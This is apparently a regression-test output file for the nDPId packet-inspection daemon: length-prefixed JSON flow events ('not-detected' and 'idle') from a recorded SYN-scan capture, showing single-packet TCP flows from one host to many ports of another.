+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
